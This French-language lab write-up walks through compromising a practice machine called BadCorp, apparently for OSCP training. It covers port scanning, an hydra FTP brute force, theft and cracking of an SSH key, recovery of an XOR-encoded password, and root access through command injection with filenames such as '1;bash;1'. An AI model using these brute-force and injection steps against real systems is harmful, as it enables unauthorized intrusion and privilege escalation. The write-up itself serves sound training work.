Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 05:48 EDT
Nmap scan report for 192.168.210.133
Host is up (0.033s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: BadCorp| Html5 Agency template
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP (80)
Nous visitons la page et trouvons rien de véritablement intéressant. Nous avons trouvé une adresse mail, ce qui nous conduit à un nom de domaine : badcorp.lo. Nous l'avons ajouté au fichier /etc/hosts puis avons mené une énumération de sous-domaine et de répertoires. Sans résultats.
La seule page nous fournissant quelques informations est la page about.html, nous avons des noms et des numéros de téléphones...
On va récupérer ces noms afin d'en créer une liste d'username puis essayer de buteforce avec hydra.
Même principe avec les autres utilisateurs
Bingo !
Accès initial
Nous avons besoin d'une passphrase.
Elévation des privilèges
Nous allons chercher le mot de passe. Avec la commande strings nous ne trouvons rien d'intéressant, nous allons donc télécharger le fichier sur notre machine.
Reverse
Nous avons chargé le programme, ajouté un argument, et deassemblé deux fonctions : main et check. Ici check nous intéresse, nous devons savoir quelles sont les valeurs contenu dans les registres avant l'appel de la fonction strcmp.
Nous allons mettre un breakpoint à l'adresse 0x000055555555554d (call 0x555555555090 strcmp@plt)
Nous allons voir ce que contient le registre rsi (présent deux lignes au dessus avec comme nom de variables "pw")
Le password semble encodé. Une ligne nous intéresse dans le code précédement déassemblé : xor $0xc,%eax. La clé XOR est 0xc.
Nous pouvons décoder le mot de passe.
Revenons à notre binaire sur notre victime
Grâce à la commande string nous pouvons voir ce que fait le programme.
Le binaire copie les fichier présents dans le dossier FTP puis copier dans /var/logs/hoswald/, nous allons voir si nous pouvons injecter des commandes en uploadant des fichier par ftp.
root !
Nous n'avons plus qu'à upload: "1;bash;1"
Nous pouvons aussi uploader par exemple : $(whoami)
┌──(kali㉿kali)-[~/oscp]
└─$ hydra -L user3.txt -P pass3.txt ftp://badcorp.lo
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-19 06:48:57
[DATA] max 16 tasks per 1 server, overall 16 tasks, 33 login tries (l:11/p:3), ~3 tries per task
[DATA] attacking ftp://badcorp.lo:21/
[21][ftp] host: badcorp.lo login: hoswald password: 34566550
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-19 06:49:13
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.210.133
Connected to 192.168.210.133.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 06:49. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.210.133:kali): hoswald
331 User hoswald OK. Password required
Password:
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Extended Passive mode OK (|||32235|)
150 Accepted data connection
-rwxrwxr-- 1 0 0 1766 Feb 24 2021 id_rsa
226-Options: -l
226 1 matches total
ftp> mget id_rsa
mget id_rsa [anpqy?]?
229 Extended Passive mode OK (|||61027|)
150 Accepted data connection
100% |***************| 1766 1.21 MiB/s 00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 3.15 Mbytes per second
1766 bytes received in 00:00 (587.80 KiB/s)
ftp> exit
221-Goodbye. You uploaded 0 and downloaded 2 kbytes.
221 Logout.
──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh oswald@badcorp.lo -i id_rsa
The authenticity of host 'badcorp.lo (192.168.210.133)' can't be established.
ED25519 key fingerprint is SHA256:mqPCrimr9j626KOGoHM+qxgHUOYD4pu1+4KzhIvu5uA.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:8: [hashed name]
~/.ssh/known_hosts:10: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'badcorp.lo' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
┌──(kali㉿kali)-[~/oscp]
└─$ ssh2john id_rsa > hash.txt
┌──(kali㉿kali)-[~/oscp]
└─$ john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
developer (id_rsa)
1g 0:00:00:00 DONE (2024-08-19 08:45) 25.00g/s 3754Kp/s 3754Kc/s 3754KC/s dick13..dester
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~]
└─$ ssh hoswald@192.168.210.133 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux badcorp 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ id
uid=1000(hoswald) gid=1000(hoswald) groups=1000(hoswald)
hoswald@badcorp:/var/logs/hoswald$ strings /usr/local/bin/backup
/lib64/ld-linux-x86-64.so.2
{...}
u/UH
[]A\A]A^A_
Bad character found !
/var/logs/%s/
/home/FTP/%s/
Could not open current directory
Create destination directory
/bin/mkdir -p /var/logs/%s/
FOLDER
%s %s
/bin/cp -rf %s%s %s
FILE
ALL FILE COPYED IN %s
Wrong Password !!!
USAGE: backup <password>
;*3$"
{<~:GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
{...}
hoswald@badcorp:~$ /usr/local/bin/backup p4ssw0r6
Create destination directory
FILE id_rsa
ALL FILE COPYED IN /var/logs/hoswald/
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami"
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami;"
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami;id"
{...}
ftp> put test;whoami;id
local: test;whoami;id remote: test;whoami;id
229 Extended Passive mode OK (|||8383|)
150 Accepted data connection
0 0.00 KiB/s
226 File successfully transferred
ftp> dir
229 Extended Passive mode OK (|||29312|)
150 Accepted data connection
-rwxrwxr-- 1 0 0 1766 Feb 24 2021 id_rsa
-rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:21 test;whoami
-rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:21 test;whoami;
-rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:23 test;whoami;id
hoswald@badcorp:/var/logs/hoswald$ /usr/local/bin/backup p4ssw0r6
FILE shell.php
FILE test;whoami;
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
root
sh: 1: /var/logs/hoswald/: Permission denied
FILE id_rsa
FILE test;whoami
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
whoami: extra operand ‘/var/logs/hoswald/’
Try 'whoami --help' for more information.
FILE reverse.elf
FILE test;whoami;id
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
root
id: ‘/var/logs/hoswald/’: no such user
ALL FILE COPYED IN /var/logs/hoswald/
hoswald@badcorp:~$ /usr/local/bin/backup p4ssw0r6
FILE 1;bash;1
/bin/cp: missing destination file operand after '/home/FTP/hoswald/1'
Try '/bin/cp --help' for more information.
root@badcorp:~# whoami
root
